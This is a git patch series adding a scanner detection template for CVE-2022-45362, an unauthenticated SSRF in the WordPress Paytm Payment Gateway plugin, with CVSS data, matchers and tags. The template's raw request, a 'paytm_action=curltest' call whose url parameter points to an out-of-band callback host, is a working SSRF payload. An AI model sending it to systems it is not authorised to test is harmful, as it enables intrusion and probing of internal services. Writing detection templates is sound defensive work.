From afa5f961143766e7e0c854b136eeb46422ef08c4 Mon Sep 17 00:00:00 2001
From: Aman Rawat <rawataman6525@gmail.com>
Date: Thu, 22 Dec 2022 15:47:57 +0530
Subject: [PATCH 1/5] Added template for CVE-2022-45362

---
 cves/2022/CVE-2022-45362.yaml | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 cves/2022/CVE-2022-45362.yaml

diff --git a/cves/2022/CVE-2022-45362.yaml b/cves/2022/CVE-2022-45362.yaml
new file mode 100644
index 0000000000..421b0ed02e
--- /dev/null
+++ b/cves/2022/CVE-2022-45362.yaml
@@ -0,0 +1,29 @@
+id: CVE-2022-45362
+
+info:
+  name: Paytm Payment Gateway Plugin <= 2.7.0 Server Side Request Forgery (SSRF)
+  author: theamanrawat
+  severity: high
+  description: |
+     Server Side Request Forgery (SSRF) vulnerability in WordPress Paytm Payment Gateway Plugin. This could allow a malicious actor to cause a website to execute website requests to an arbitrary domain of the attacker. This could allow a malicious actor to find sensitive information.
+  reference:
+    - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability
+    - https://wordpress.org/plugins/paytm-payments/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-45362
+  tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth
+
+requests:
+  - raw:
+      - |
+        GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file

From ff6df80893208a713bbe3908dcd746641820a56e Mon Sep 17 00:00:00 2001
From: Aman Rawat <rawataman6525@gmail.com>
Date: Thu, 22 Dec 2022 15:50:55 +0530
Subject: [PATCH 2/5] Updated

---
 cves/2022/CVE-2022-45362.yaml | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/cves/2022/CVE-2022-45362.yaml b/cves/2022/CVE-2022-45362.yaml
index 421b0ed02e..e0c060bfa8 100644
--- a/cves/2022/CVE-2022-45362.yaml
+++ b/cves/2022/CVE-2022-45362.yaml
@@ -10,6 +10,10 @@ info:
     - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability
     - https://wordpress.org/plugins/paytm-payments/
     - https://nvd.nist.gov/vuln/detail/CVE-2022-45362
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cve-id: CVE-2022-45362
   tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth
 
 requests:

From a6eacccd5197927413905878cc89bf8e39266f27 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 23 Dec 2022 15:55:03 +0530
Subject: [PATCH 3/5] Update CVE-2022-45362.yaml

---
 cves/2022/CVE-2022-45362.yaml | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/cves/2022/CVE-2022-45362.yaml b/cves/2022/CVE-2022-45362.yaml
index e0c060bfa8..c81be0c1bd 100644
--- a/cves/2022/CVE-2022-45362.yaml
+++ b/cves/2022/CVE-2022-45362.yaml
@@ -28,6 +28,11 @@ requests:
         words:
           - "http"
 
+      - type: word
+        part: body
+        words:
+          - "paytm-payments.css"
+
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200

From d87088d3c73b5cf6beb26bd7fbf55b7ad2f75cbc Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Fri, 23 Dec 2022 16:21:17 +0530
Subject: [PATCH 4/5] added metadata,tags

---
 cves/2022/CVE-2022-45362.yaml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/cves/2022/CVE-2022-45362.yaml b/cves/2022/CVE-2022-45362.yaml
index c81be0c1bd..393b7695ed 100644
--- a/cves/2022/CVE-2022-45362.yaml
+++ b/cves/2022/CVE-2022-45362.yaml
@@ -14,7 +14,9 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     cvss-score: 7.2
     cve-id: CVE-2022-45362
-  tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth
+  metadata:
+    verified: true
+  tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth,oast
 
 requests:
   - raw:

From fa8420fe9294d9e0b253680cd276f8c541d4ae77 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Fri, 23 Dec 2022 18:09:05 +0530
Subject: [PATCH 5/5] added tag

---
 cves/2022/CVE-2022-45362.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2022/CVE-2022-45362.yaml b/cves/2022/CVE-2022-45362.yaml
index 393b7695ed..f35ee0a085 100644
--- a/cves/2022/CVE-2022-45362.yaml
+++ b/cves/2022/CVE-2022-45362.yaml
@@ -16,7 +16,7 @@ info:
     cve-id: CVE-2022-45362
   metadata:
     verified: true
-  tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth,oast
+  tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth,oast,paytm
 
 requests:
   - raw: